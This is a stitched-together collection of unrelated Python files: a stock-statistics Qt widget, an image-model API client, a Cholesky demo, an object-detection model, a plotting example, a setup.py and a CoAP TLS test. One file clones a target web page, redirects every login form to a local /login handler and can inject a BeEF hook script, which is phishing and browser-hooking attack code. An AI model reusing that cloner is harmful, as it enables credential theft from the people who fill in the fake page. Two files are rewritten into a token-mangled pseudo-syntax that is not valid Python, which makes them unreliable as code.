from PyQt5.QtWidgets import QTabWidget

from ....Common.DyStockCommon import *
from .DyStockDataIndexConsecutiveDayLineStatsWidget import *


class DyStockDataIndexConsecutiveDayLineStatsTabWidget(QTabWidget):
    def __init__(self, dataWindow, startDate, endDate, indexCountedDfs, greenLine=True):
        super().__init__()

        # One tab per index, each holding the per-index statistics widget
        for index, df in indexCountedDfs.items():
            self.addTab(DyStockDataIndexConsecutiveDayLineStatsWidget(dataWindow, index, df),
                        DyStockCommon.indexes[index])

        # Window title reads "Index consecutive bearish/bullish day-line statistics [startDate, endDate]"
        self.setWindowTitle('指数连续日{0}线统计[{1},{2}]'.format('阴' if greenLine else '阳', startDate, endDate))
import os
import time
import io
import sys
import json

import requests
import jsonschema

from exceptions import InvalidUrlConfiguration, ApplicationError


class ApiClient:
    def __init__(self):
        self.configuration = []
        self.url_list = self.get_url_configuration()
        self.get_api_configuration()

    def get_configuration(self):
        try:
            return self.configuration
        except ApplicationError as e:
            raise e

    @staticmethod
    def get_url_configuration():
        """
        :return: List of all the api urls provided in the url_configuration file
        """
        with open('../jsonFiles/url_configuration.json') as f:
            data = json.load(f)
            urls = data["urls"]
            try:
                validate_url_configuration(data)
            except Exception as e:
                raise InvalidUrlConfiguration
            return urls

    def get_api_configuration(self):
        for url in self.url_list:
            self.get_models(url)

    @staticmethod
    def get_model_names(url: str):
        time.sleep(5)
        response = requests.get(url=url + "models")
        models_list = response.json()["data"]["models"]
        return models_list

    def get_models(self, url: str):
        """
        Returns a list of json objects representing the configuration of each api
        corresponding to each url in the url_configuration file
        :param url: Each url in the url_configuration file
        :return: List of json objects
        """
        models_list = self.get_model_names(url)
        for model_name in models_list:
            labels_list = self.get_labels(url, model_name)
            model_type = self.get_model_configuration(url, model_name)
            palette = None
            if "segmentation" in model_type:
                palette = self.get_palette(url, model_name)
            self.configuration.append({
                "name": model_name,
                "labels": labels_list,
                "type": model_type,
                "url": url,
                "palette": palette,
            })

    @staticmethod
    def get_palette(url: str, model_name: str):
        response = requests.get(url=url + "models/" + model_name + "/palette")
        return response.json()["data"]

    @staticmethod
    def get_labels(url: str, model_name: str):
        response = requests.get(url=url + "models/" + model_name + "/labels")
        return response.json()["data"]

    @staticmethod
    def get_model_configuration(url: str, model_name: str):
        response = requests.get(url=url + "models/" + model_name + "/config")
        return response.json()["data"]["type"]

    @staticmethod
    def get_detection_response(url: str, model_name: str, im):
        response = requests.post(url=url + "models/" + model_name + "/predict",
                                 files={'input_data': io.BytesIO(im.tobytes())})
        return response.json()

    @staticmethod
    def get_segmentation_response(url: str, model_name: str, im):
        response = requests.post(url=url + "models/" + model_name + "/inference",
                                 files={'input_data': io.BytesIO(im.tobytes())})
        return response


def validate_url_configuration(data):
    """
    Validate the url_configuration file by comparing it to the urlConfigurationSchema
    :param data: The data from the url_configuration file
    """
    with open('urlConfigurationSchema') as f:
        schema = json.load(f)
    try:
        jsonschema.validate(data, schema)
    except Exception as e:
        raise InvalidUrlConfiguration(e)
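
# Illustrative usage sketch (added for clarity, not part of the original module).
# It assumes ../jsonFiles/url_configuration.json and the urlConfigurationSchema
# file exist and that the listed model servers are reachable.
if __name__ == "__main__":
    client = ApiClient()
    for model in client.get_configuration():
        print(model["name"], model["type"], model["url"])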
import requests
import re
import os

# CLONING FUNCTIONS --------------------------------------------------------------------------------------------


def clone(url, user_agent, beef):
    try:
        # Mirror the target page into templates/fake/<user_agent>/<url-with-scheme-flattened>/index.html
        u = url.replace('://', '-')
        q = 'templates/fake/{}/{}'.format(user_agent, u)
        os.makedirs(q, exist_ok=True)
        temp_ind_path = 'templates/fake/{}/{}/index.html'.format(user_agent, u)

        headers = {'User-Agent': user_agent}
        r = requests.get(url, headers=headers)
        html = r.text

        # Rewrite every form action so submissions land on the local /login handler
        old_actions = re.findall(r'action="([^ >"]*)"', html)
        new_action = '/login'
        for action in old_actions:
            print(action)
            html = html.replace(action, new_action)

        # Optionally inject the BeEF hook script before </body>; the hook host is
        # left unspecified in the original source
        if beef == 'yes':
            inject = '<script src=":3000/hook.js" type="text/javascript"></script></body>'
            html = html.replace("</body>", inject)

        with open(temp_ind_path, 'w') as new_html:
            new_html.write(html.encode('ascii', 'ignore').decode('ascii'))
    except Exception:
        # Errors are silently ignored, as in the original code
        pass

# --------------------------------------------------------------------------------------------------------------------
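
# Illustrative usage sketch (added for clarity, not part of the original file);
# the target URL and user-agent string below are placeholders.
if __name__ == "__main__":
    clone("https://example.com/login", "Mozilla/5.0", beef="no")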
import numpy as np
import scipy.linalg as la

from auxiliary import *

a = np.matrix([[+3, +0, -3, +0],
               [+0, +3, +1, +2],
               [-3, +1, +4, +1],
               [+0, +2, +1, +3],
               ], dtype=float)

res = la.cholesky(a, lower=False)
mprint('aUp', res)

res = la.cholesky(a, lower=True)
mprint('aLo', res)
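
# Quick sanity check (added for illustration, not in the original script): after the
# second call, `res` holds the lower-triangular factor L, and L @ L.T should
# reproduce the original matrix up to floating-point error.
assert np.allclose(res @ res.T, a)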
<import_from_future_stmt> division<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>.base BaseDetector<import_from_stmt>.test_mixins RPNTestMixin<import_from_stmt>.. builder<import_from_stmt>..registry DETECTORS<import_from_stmt>mmdet.core assign_and_sample bbox2roi bbox2result multi_apply merge_aug_masks <import_stmt>numpy<as>np<import_stmt>pickle<import_from_stmt>..utils ConvModule<import_stmt>torch.nn.functional<as>F<line_sep>@DETECTORS.register_module<class_stmt>ReasoningRCNN(BaseDetector RPNTestMixin)<block_start><def_stmt>__init__ self num_stages backbone neck=<none> upper_neck=<none> rpn_head=<none> bbox_roi_extractor=<none> bbox_head=<none> mask_roi_extractor=<none> mask_head=<none> train_cfg=<none> test_cfg=<none> pretrained=<none> adj_gt=<none> graph_out_channels=256 normalize=<none> roi_feat_size=7 shared_num_fc=2<block_start><assert_stmt>bbox_roi_extractor<is><not><none><assert_stmt>bbox_head<is><not><none><line_sep>super(ReasoningRCNN self).__init__()<line_sep>self.num_stages=num_stages<line_sep>self.backbone=builder.build_backbone(backbone)<if_stmt>neck<is><not><none><block_start>self.neck=builder.build_neck(neck)<block_end><else_stmt><block_start><assert_stmt>upper_neck<is><not><none><block_end><if_stmt>rpn_head<is><not><none><block_start>self.rpn_head=builder.build_rpn_head(rpn_head)<block_end><if_stmt>upper_neck<is><not><none><block_start><if_stmt>isinstance(upper_neck list)<block_start>self.upper_neck=nn.ModuleList()<assert_stmt>len(upper_neck)<eq>self.num_stages<for_stmt>neck upper_neck<block_start>self.upper_neck.append(builder.build_upper_neck(neck))<block_end><block_end><else_stmt><block_start>self.upper_neck=builder.build_upper_neck(upper_neck)<block_end><block_end><if_stmt>bbox_head<is><not><none><block_start>self.bbox_roi_extractor=nn.ModuleList()<line_sep>self.bbox_head=nn.ModuleList()<if_stmt><not>isinstance(bbox_roi_extractor list)<block_start>bbox_roi_extractor=[bbox_roi_extractor<for>_ range(num_stages)]<block_end><if_stmt><not>isinstance(bbox_head list)<block_start>bbox_head=[bbox_head<for>_ range(num_stages)]<block_end><assert_stmt>len(bbox_roi_extractor)<eq>len(bbox_head)<eq>self.num_stages<for_stmt>roi_extractor,head zip(bbox_roi_extractor bbox_head)<block_start>self.bbox_roi_extractor.append(builder.build_roi_extractor(roi_extractor))<line_sep>self.bbox_head.append(builder.build_bbox_head(head))<block_end><block_end><if_stmt>mask_head<is><not><none><block_start>self.mask_head=nn.ModuleList()<if_stmt><not>isinstance(mask_head list)<block_start>mask_head=[mask_head<for>_ range(num_stages)]<block_end><assert_stmt>len(mask_head)<eq>self.num_stages<for_stmt>head mask_head<block_start>self.mask_head.append(builder.build_mask_head(head))<block_end><if_stmt>mask_roi_extractor<is><not><none><block_start>self.mask_roi_extractor=nn.ModuleList()<if_stmt><not>isinstance(mask_roi_extractor list)<block_start>mask_roi_extractor=[mask_roi_extractor<for>_ range(num_stages)]<block_end><assert_stmt>len(mask_roi_extractor)<eq>self.num_stages<for_stmt>roi_extractor mask_roi_extractor<block_start>self.mask_roi_extractor.append(builder.build_roi_extractor(roi_extractor))<block_end><block_end><block_end>self.normalize=normalize<line_sep>self.with_bias=normalize<is><none><if_stmt>adj_gt<is><not><none><block_start>self.adj_gt=pickle.load(open(adj_gt 'rb'))<line_sep>self.adj_gt=np.float32(self.adj_gt)<line_sep>self.adj_gt=nn.Parameter(torch.from_numpy(self.adj_gt) requires_grad=<false>)<block_end># init cmp attention 
self.cmp_attention=nn.ModuleList()<line_sep>self.cmp_attention.append(ConvModule(1024 1024<floordiv>16 3 stride=2 padding=1 normalize=self.normalize bias=self.with_bias))<line_sep>self.cmp_attention.append(nn.Linear(1024<floordiv>16 bbox_head[0]['in_channels']+1))<line_sep># init graph w self.graph_out_channels=graph_out_channels<line_sep>self.graph_weight_fc=nn.Linear(bbox_head[0]['in_channels']+1 self.graph_out_channels)<line_sep>self.relu=nn.ReLU(inplace=<true>)<line_sep># shared upper neck in_channels=rpn_head['in_channels']<if_stmt>shared_num_fc<g>0<block_start>in_channels<augmul>(roi_feat_size<times>roi_feat_size)<block_end>self.branch_fcs=nn.ModuleList()<for_stmt>i range(shared_num_fc)<block_start>fc_in_channels=(in_channels<if>i<eq>0<else>bbox_head[0]['in_channels'])<line_sep>self.branch_fcs.append(nn.Linear(fc_in_channels bbox_head[0]['in_channels']))<block_end>self.train_cfg=train_cfg<line_sep>self.test_cfg=test_cfg<line_sep>self.init_weights(pretrained=pretrained)<block_end>@property<def_stmt>with_rpn self<block_start><return>hasattr(self 'rpn_head')<and>self.rpn_head<is><not><none><block_end><def_stmt>init_weights self pretrained=<none><block_start>super(ReasoningRCNN self).init_weights(pretrained)<line_sep>self.backbone.init_weights(pretrained=pretrained)<if_stmt>self.with_neck<block_start><if_stmt>isinstance(self.neck nn.Sequential)<block_start><for_stmt>m self.neck<block_start>m.init_weights()<block_end><block_end><else_stmt><block_start>self.neck.init_weights()<block_end><block_end><if_stmt>self.with_rpn<block_start>self.rpn_head.init_weights()<block_end><for_stmt>i range(self.num_stages)<block_start><if_stmt>self.with_bbox<block_start>self.bbox_roi_extractor[i].init_weights()<line_sep>self.bbox_head[i].init_weights()<block_end><if_stmt>self.with_mask_roi_extractor<block_start>self.mask_roi_extractor[i].init_weights()<block_end><if_stmt>self.with_mask<block_start>self.mask_head[i].init_weights()<block_end><block_end><block_end><def_stmt>extract_feat self img<block_start>x=self.backbone(img)<if_stmt>self.with_neck<block_start>x=self.neck(x)<block_end><return>x<block_end><def_stmt>forward_upper_neck self x stage<block_start><if_stmt>self.with_share_upper_neck<block_start>x=self.upper_neck(x)<block_end><elif_stmt>self.with_unshare_upper_neck<block_start>x=self.upper_neck[stage](x)<block_end><return>x<block_end><def_stmt>forward_train self img img_meta gt_bboxes gt_bboxes_ignore gt_labels gt_masks=<none> proposals=<none><block_start>x=self.extract_feat(img)<line_sep># precmp attention <if_stmt>len(x)<g>1<block_start>base_feat=[]<for_stmt>b_f x[1:]<block_start>base_feat.append(F.interpolate(b_f scale_factor=(x[2].size(2)/b_f.size(2) x[2].size(3)/b_f.size(3))))<block_end>base_feat=torch.cat(base_feat 1)<block_end><else_stmt><block_start>base_feat=torch.cat(x 1)<block_end><for_stmt>ops self.cmp_attention<block_start>base_feat=ops(base_feat)<if_stmt>len(base_feat.size())<g>2<block_start>base_feat=base_feat.mean(3).mean(2)<block_end><else_stmt><block_start>base_feat=self.relu(base_feat)<block_end><block_end>losses=dict()<if_stmt>self.with_rpn<block_start>rpn_outs=self.rpn_head(x)<line_sep>rpn_loss_inputs=rpn_outs+(gt_bboxes img_meta self.train_cfg.rpn)<line_sep>rpn_losses=self.rpn_head.loss(*rpn_loss_inputs)<line_sep>losses.update(rpn_losses)<line_sep>proposal_inputs=rpn_outs+(img_meta self.test_cfg.rpn)<line_sep>proposal_list=self.rpn_head.get_proposals(*proposal_inputs)<block_end><else_stmt><block_start>proposal_list=proposals<block_end><for_stmt>i 
range(self.num_stages)<block_start>rcnn_train_cfg=self.train_cfg.rcnn[i]<line_sep>lw=self.train_cfg.stage_loss_weights[i]<line_sep># add reasoning process <if_stmt>i<g>0# 1.build global semantic pool <block_start>global_semantic_pool=torch.cat((bbox_head.fc_cls.weight bbox_head.fc_cls.bias.unsqueeze(1)) 1).detach()<line_sep># 2.compute graph attention attention_map=nn.Softmax(1)(torch.mm(base_feat torch.transpose(global_semantic_pool 0 1)))<line_sep># 3.adaptive global reasoning alpha_em=attention_map.unsqueeze(-1)<times>torch.mm(self.adj_gt global_semantic_pool).unsqueeze(0)<line_sep>alpha_em=alpha_em.view(-1 global_semantic_pool.size(-1))<line_sep>alpha_em=self.graph_weight_fc(alpha_em)<line_sep>alpha_em=self.relu(alpha_em)<line_sep># enhanced_feat = torch.mm(nn.Softmax(1)(cls_score), alpha_em) n_classes=bbox_head.fc_cls.weight.size(0)<line_sep>cls_prob=nn.Softmax(1)(cls_score).view(len(img_meta) -1 n_classes)<line_sep>enhanced_feat=torch.bmm(cls_prob alpha_em.view(len(img_meta) -1 self.graph_out_channels))<line_sep>enhanced_feat=enhanced_feat.view(-1 self.graph_out_channels)<line_sep># assign gts and sample proposals <block_end>assign_results,sampling_results=multi_apply(assign_and_sample proposal_list gt_bboxes gt_bboxes_ignore gt_labels cfg=rcnn_train_cfg)<line_sep># bbox head forward and loss bbox_roi_extractor=self.bbox_roi_extractor[i]<line_sep>bbox_head=self.bbox_head[i]<line_sep>rois,rois_index=bbox2roi([(res.pos_bboxes res.neg_bboxes)<for>res sampling_results] return_index=<true>)<line_sep>bbox_feats=bbox_roi_extractor(x[:bbox_roi_extractor.num_inputs] rois)<line_sep># without upperneck bbox_feats=bbox_feats.view(bbox_feats.size(0) -1)<for_stmt>fc self.branch_fcs<block_start>bbox_feats=self.relu(fc(bbox_feats))<block_end># cat with enhanced feature <if_stmt>i<g>0<block_start>bbox_feats=torch.cat([bbox_feats enhanced_feat] 1)<block_end>cls_score,bbox_pred=bbox_head(bbox_feats)<line_sep>bbox_targets=bbox_head.get_target(sampling_results gt_bboxes gt_labels rcnn_train_cfg)<line_sep>loss_bbox=bbox_head.loss(cls_score bbox_pred *bbox_targets)<for_stmt>name,value loss_bbox.items()<block_start>losses['s{}.{}'.format(i name)]=(value<times>lw<if>'loss'<in>name<else>value)<block_end># mask head forward and loss <if_stmt>self.with_mask<block_start><if_stmt>self.with_mask_roi_extractor<block_start>mask_roi_extractor=self.mask_roi_extractor[i]<line_sep>pos_rois=bbox2roi([res.pos_bboxes<for>res sampling_results])<line_sep>mask_feats=mask_roi_extractor(x[:mask_roi_extractor.num_inputs] pos_rois)<line_sep>mask_feats=self.forward_upper_neck(mask_feats i)<block_end><else_stmt><block_start>pos_inds=(rois_index<eq>0)<line_sep>mask_feats=bbox_feats[pos_inds]<block_end>mask_head=self.mask_head[i]<line_sep>mask_pred=mask_head(mask_feats)<line_sep>mask_targets=mask_head.get_target(sampling_results gt_masks rcnn_train_cfg)<line_sep>pos_labels=torch.cat([res.pos_gt_labels<for>res sampling_results])<line_sep>loss_mask=mask_head.loss(mask_pred mask_targets pos_labels)<for_stmt>name,value loss_mask.items()<block_start>losses['s{}.{}'.format(i name)]=(value<times>lw<if>'loss'<in>name<else>value)<block_end><block_end># refine bboxes <if_stmt>i<l>self.num_stages-1<block_start>pos_is_gts=[res.pos_is_gt<for>res sampling_results]<line_sep>roi_labels=bbox_targets[0]# bbox_targets is a tuple <with_stmt>torch.no_grad()<block_start>proposal_list=bbox_head.refine_bboxes(rois roi_labels bbox_pred pos_is_gts img_meta)<block_end><block_end><block_end><return>losses<block_end><def_stmt>simple_test self img img_meta 
proposals=<none> rescale=<false><block_start>x=self.extract_feat(img)<line_sep># precmp attention <if_stmt>len(x)<g>1<block_start>base_feat=[]<for_stmt>b_f x[1:]<block_start>base_feat.append(F.interpolate(b_f scale_factor=(x[2].size(2)/b_f.size(2) x[2].size(3)/b_f.size(3))))<block_end>base_feat=torch.cat(base_feat 1)<block_end><else_stmt><block_start>base_feat=torch.cat(x 1)<block_end><for_stmt>ops self.cmp_attention<block_start>base_feat=ops(base_feat)<if_stmt>len(base_feat.size())<g>2<block_start>base_feat=base_feat.mean(3).mean(2)<block_end><else_stmt><block_start>base_feat=self.relu(base_feat)<block_end><block_end>proposal_list=self.simple_test_rpn(x img_meta self.test_cfg.rpn)<if>proposals<is><none><else>proposals<line_sep>img_shape=img_meta[0]['img_shape']<line_sep>ori_shape=img_meta[0]['ori_shape']<line_sep>scale_factor=img_meta[0]['scale_factor']<line_sep># "ms" in variable names means multi-stage ms_bbox_result={}<line_sep>ms_segm_result={}<line_sep>ms_scores=[]<line_sep>rcnn_test_cfg=self.test_cfg.rcnn<line_sep>rois=bbox2roi(proposal_list)<for_stmt>i range(self.num_stages)# add reasoning process <block_start><if_stmt>i<g>0# transform CxC classes graph to region # 1.build global semantic pool <block_start>global_semantic_pool=torch.cat((bbox_head.fc_cls.weight bbox_head.fc_cls.bias.unsqueeze(1)) 1).detach()<line_sep># 2.compute graph attention attention_map=nn.Softmax(1)(torch.mm(base_feat torch.transpose(global_semantic_pool 0 1)))<line_sep># 3.adaptive global reasoning alpha_em=attention_map.unsqueeze(-1)<times>torch.mm(self.adj_gt global_semantic_pool).unsqueeze(0)<line_sep>alpha_em=alpha_em.view(-1 global_semantic_pool.size(-1))<line_sep>alpha_em=self.graph_weight_fc(alpha_em)<line_sep>alpha_em=self.relu(alpha_em)<line_sep>n_classes=bbox_head.fc_cls.weight.size(0)<line_sep>cls_prob=nn.Softmax(1)(cls_score).view(len(img_meta) -1 n_classes)<line_sep>enhanced_feat=torch.bmm(cls_prob alpha_em.view(len(img_meta) -1 self.graph_out_channels))<line_sep>enhanced_feat=enhanced_feat.view(-1 self.graph_out_channels)<block_end>bbox_roi_extractor=self.bbox_roi_extractor[i]<line_sep>bbox_head=self.bbox_head[i]<line_sep>bbox_feats=bbox_roi_extractor(x[:len(bbox_roi_extractor.featmap_strides)] rois)<line_sep># bbox_feats = self.forward_upper_neck(bbox_feats, i) # without upperneck bbox_feats=bbox_feats.view(bbox_feats.size(0) -1)<for_stmt>fc self.branch_fcs<block_start>bbox_feats=self.relu(fc(bbox_feats))<block_end># cat with enhanced feature <if_stmt>i<g>0<block_start>bbox_feats=torch.cat([bbox_feats enhanced_feat] 1)<block_end>cls_score,bbox_pred=bbox_head(bbox_feats)<line_sep>ms_scores.append(cls_score)<if_stmt>self.test_cfg.keep_all_stages<block_start>det_bboxes,det_labels=bbox_head.get_det_bboxes(rois cls_score bbox_pred img_shape scale_factor rescale=rescale cfg=rcnn_test_cfg)<line_sep>bbox_result=bbox2result(det_bboxes det_labels bbox_head.num_classes)<line_sep>ms_bbox_result['stage{}'.format(i)]=bbox_result<if_stmt>self.with_mask<block_start><if_stmt>self.with_mask_roi_extractor<block_start>mask_roi_extractor=self.mask_roi_extractor[i]<block_end><else_stmt><block_start>mask_roi_extractor=self.bbox_roi_extractor[i]<block_end>mask_head=self.mask_head[i]<if_stmt>det_bboxes.shape[0]<eq>0<block_start>segm_result=[[]<for>_ range(mask_head.num_classes-1)]<block_end><else_stmt><block_start>_bboxes=(det_bboxes[: :4]<times>scale_factor<if>rescale<else>det_bboxes)<line_sep>mask_rois=bbox2roi([_bboxes])<line_sep>mask_feats=mask_roi_extractor(x[:len(mask_roi_extractor.featmap_strides)] 
mask_rois)<line_sep>mask_feats=self.forward_upper_neck(mask_feats i)<line_sep>mask_pred=mask_head(mask_feats)<line_sep>segm_result=mask_head.get_seg_masks(mask_pred _bboxes det_labels rcnn_test_cfg ori_shape scale_factor rescale)<block_end>ms_segm_result['stage{}'.format(i)]=segm_result<block_end><block_end><if_stmt>i<l>self.num_stages-1<block_start>bbox_label=cls_score.argmax(dim=1)<line_sep>rois=bbox_head.regress_by_class(rois bbox_label bbox_pred img_meta[0])<block_end><block_end>cls_score=sum(ms_scores)/self.num_stages<line_sep>det_bboxes,det_labels=self.bbox_head[-1].get_det_bboxes(rois cls_score bbox_pred img_shape scale_factor rescale=rescale cfg=rcnn_test_cfg)<line_sep>bbox_result=bbox2result(det_bboxes det_labels self.bbox_head[-1].num_classes)<line_sep>ms_bbox_result['ensemble']=bbox_result<if_stmt>self.with_mask<block_start><if_stmt>det_bboxes.shape[0]<eq>0<block_start>segm_result=[[]<for>_ range(self.mask_head[-1].num_classes-1)]<block_end><else_stmt><block_start>_bboxes=(det_bboxes[: :4]<times>scale_factor<if>rescale<else>det_bboxes)<line_sep>mask_rois=bbox2roi([_bboxes])<line_sep>aug_masks=[]<for_stmt>i range(self.num_stages)<block_start><if_stmt>self.with_mask_roi_extractor<block_start>mask_roi_extractor=self.mask_roi_extractor[i]<block_end><else_stmt><block_start>mask_roi_extractor=self.bbox_roi_extractor[i]<block_end>mask_feats=mask_roi_extractor(x[:len(mask_roi_extractor.featmap_strides)] mask_rois)<line_sep>mask_feats=self.forward_upper_neck(mask_feats i)<line_sep>mask_pred=self.mask_head[i](mask_feats)<line_sep>aug_masks.append(mask_pred.sigmoid().cpu().numpy())<block_end>merged_masks=merge_aug_masks(aug_masks [img_meta]<times>self.num_stages self.test_cfg.rcnn)<line_sep>segm_result=self.mask_head[-1].get_seg_masks(merged_masks _bboxes det_labels rcnn_test_cfg ori_shape scale_factor rescale)<block_end>ms_segm_result['ensemble']=segm_result<block_end><if_stmt><not>self.test_cfg.keep_all_stages<block_start><if_stmt>self.with_mask<block_start>results=(ms_bbox_result['ensemble'] ms_segm_result['ensemble'])<block_end><else_stmt><block_start>results=ms_bbox_result['ensemble']<block_end><block_end><else_stmt><block_start><if_stmt>self.with_mask<block_start>results={stage:(ms_bbox_result[stage] ms_segm_result[stage])<for>stage ms_bbox_result}<block_end><else_stmt><block_start>results=ms_bbox_result<block_end><block_end><return>results<block_end><def_stmt>aug_test self img img_meta proposals=<none> rescale=<false><block_start><raise>NotImplementedError<block_end><def_stmt>show_result self data result img_norm_cfg **kwargs<block_start><if_stmt>self.with_mask<block_start>ms_bbox_result,ms_segm_result=result<if_stmt>isinstance(ms_bbox_result dict)<block_start>result=(ms_bbox_result['ensemble'] ms_segm_result['ensemble'])<block_end><block_end><else_stmt><block_start><if_stmt>isinstance(result dict)<block_start>result=result['ensemble']<block_end><block_end>super(ReasoningRCNN self).show_result(data result img_norm_cfg **kwargs)<block_end><block_end>
"""Scrapes grapheme-to-phoneme data from Wiktionary."""<import_stmt>pkg_resources<import_from_stmt>wikipron.config Config<import_from_stmt>wikipron.scrape scrape<line_sep>__version__=pkg_resources.get_distribution("wikipron").version<line_sep>__all__=["__version__" "Config" "scrape"]<line_sep>
# -----------------------------------------------------------------------------
# Matplotlib cheat sheet
# Released under the BSD License
# -----------------------------------------------------------------------------
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt

fig = plt.figure(figsize=(4, 4))
ax = fig.add_axes([0.15, 0.15, .7, .7], frameon=True, aspect=1,
                  xticks=[], yticks=[])


def text(x, y, _text):
    color = "C1"
    if not 0 < x < 1 or not 0 < y < 1:
        color = "C0"
    size = 0.15
    ax.text(x, y, _text, color="white",  # bbox={"color": "C1"},
            size="xx-large", weight="bold", ha="center", va="center")
    rect = plt.Rectangle((x - size / 2, y - size / 2), size, size,
                         facecolor=color, zorder=-10, clip_on=False)
    ax.add_patch(rect)


def point(x, y):
    ax.scatter([x], [y], facecolor="C0", edgecolor="white",
               zorder=10, clip_on=False)


d = .1
e = .15 / 2

text(d, d, "3"), text(0.5, d, "8"), text(1 - d, d, "4")
text(d, 0.5, "6"), text(0.5, 0.5, "10"), text(1 - d, 0.5, "7")
text(d, 1 - d, "2"), text(0.5, 1 - d, "9"), text(1 - d, 1 - d, "1")

text(-d, 1 - d, "A"), text(-d, 0.5, "B"), text(-d, d, "C")
point(-d + e, 1 - d + e), point(-d + e, 0.5), point(-d + e, d - e)

text(d, -d, "D"), text(0.5, -d, "E"), text(1 - d, -d, "F")
point(d - e, -d + e), point(0.5, -d + e), point(1 - d + e, -d + e)

text(1 + d, d, "G"), text(1 + d, 0.5, "H"), text(1 + d, 1 - d, "I")
point(1 + d - e, d - e), point(1 + d - e, .5), point(1 + d - e, 1 - d + e)

text(1 - d, 1 + d, "J"), text(0.5, 1 + d, "K"), text(d, 1 + d, "L")
point(1 - d + e, 1 + d - e), point(0.5, 1 + d - e), point(d - e, 1 + d - e)

plt.xlim(0, 1), plt.ylim(0, 1)
plt.savefig("../figures/legend-placement.pdf")
# plt.show()
import io
import os
import re

from setuptools import find_packages
from setuptools import setup

from bustag import __version__


def read(filename):
    filename = os.path.join(os.path.dirname(__file__), filename)
    text_type = type(u"")
    with io.open(filename, mode="r", encoding='utf-8') as fd:
        return re.sub(text_type(r':[a-z]+:`~?(.*?)`'), text_type(r'``\1``'), fd.read())


setup(
    name="bustag",
    version=__version__,
    url="https://github.com/gxtrobot/bustag",
    license='MIT',
    author="gxtrobot",
    author_email="<EMAIL>",
    description="a tag and recommend system for old bus driver",
    long_description=read("README.md"),
    packages=find_packages(exclude=('tests',)),
    install_requires=[],
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
)
# This file is part of the Python aiocoap library project. # # Copyright (c) 2012-2014 <NAME> <http://sixpinetrees.blogspot.com/>, # 2013-2014 <NAME> <<EMAIL>> # # aiocoap is free software, this file is published under the MIT license as # described in the accompanying LICENSE file. <import_stmt>json<import_stmt>tempfile<import_stmt>shutil<import_stmt>subprocess<import_stmt>unittest<import_stmt>sys<import_stmt>aiocoap<import_from_stmt>.test_server WithClient WithTestServer run_fixture_as_standalone_server<import_from_stmt>.fixtures no_warnings asynctest<import_from_stmt>.common tcp_disabled<line_sep>IS_STANDALONE=<false><class_stmt>WithTLSServer(WithTestServer)<block_start><def_stmt>setUp self<block_start>self.keydir=tempfile.mkdtemp(suffix="-testkeypair")<line_sep>self.keyfile=self.keydir+'/key.pem'<line_sep>self.certfile=self.keydir+'/cert.pem'<line_sep>self.credentialsfile=self.keydir+'/credentials.json'<line_sep>subprocess.check_call(['openssl' 'req' '-x509' '-newkey' 'rsa:4096' '-keyout' self.keyfile '-out' self.certfile '-days' '5' '-nodes' '-subj' '/CN=%s'%self.servernamealias] stderr=subprocess.DEVNULL )<line_sep># Write out for the benefit of standalone clients during debugging <with_stmt>open(self.credentialsfile 'w')<as>of<block_start>json.dump({'coaps+tcp://%s/*'%self.servernamealias:{'tlscert':{'certfile':self.certfile}}} of)<block_end><if_stmt>IS_STANDALONE<block_start>print("To test, run ./aiocoap-client coaps+tcp://%s/whoami --credentials %s"%(self.servernamealias self.credentialsfile ))<block_end>super().setUp()<block_end><def_stmt>tearDown self<block_start>super().tearDown()<line_sep>shutil.rmtree(self.keydir)<block_end><def_stmt>get_server_ssl_context self<block_start><import_stmt>ssl<line_sep># FIXME: copied from aiocoap.cli.common ssl_context=ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)<line_sep>ssl_context.load_cert_chain(certfile=self.certfile keyfile=self.keyfile)<line_sep>ssl_context.set_alpn_protocols(["coap"])<if_stmt>hasattr(ssl_context 'sni_callback')# starting python 3.7 <block_start>ssl_context.sni_callback=<lambda>obj name context:setattr(obj "indicated_server_name" name)<block_end><return>ssl_context<block_end><block_end><class_stmt>WithTLSClient(WithClient)# This expects that something -- typically the colocated WithTestServer -- sets certfile first <block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.client.client_credentials['coaps+tcp://%s/*'%self.servernamealias]=aiocoap.credentials.TLSCert(certfile=self.certfile)<block_end><block_end>@unittest.skipIf(tcp_disabled "TCP disabled in environment")<class_stmt>TestTLS(WithTLSServer WithTLSClient)<block_start>@no_warnings@asynctest<async_keyword><def_stmt>test_tls self<block_start>request=aiocoap.Message(code=aiocoap.GET)<line_sep>request.set_request_uri('coaps+tcp://%s/whoami'%self.servernamealias set_uri_host=<false>)<line_sep>response=<await>self.client.request(request).response_raising<line_sep>response=json.loads(response.payload)<line_sep>self.assertEqual(response['requested_uri'] 'coaps+tcp://%s/whoami'%self.servernamealias "SNI name was not used by the server")<block_end><if_stmt>sys.version_info<l>(3 7)<block_start>test_tls=unittest.expectedFailure(test_tls)# SNI support was only added in Python 3.7 <block_end><if_stmt>'PyPy'<in>sys.version# For PyPy exclusion, see https://foss.heptapod.net/pypy/pypy/-/issues/3359 # Completely skipping a test that causes segfaults <block_start>test_tls=<none><block_end><block_end><if_stmt>__name__<eq>"__main__"# due to the imports, 
you'll need to run this as `python3 -m tests.test_server` <block_start>IS_STANDALONE=<true><import_stmt>logging<line_sep>logging.basicConfig(level=logging.DEBUG)<line_sep>run_fixture_as_standalone_server(TestTLS)<block_end>
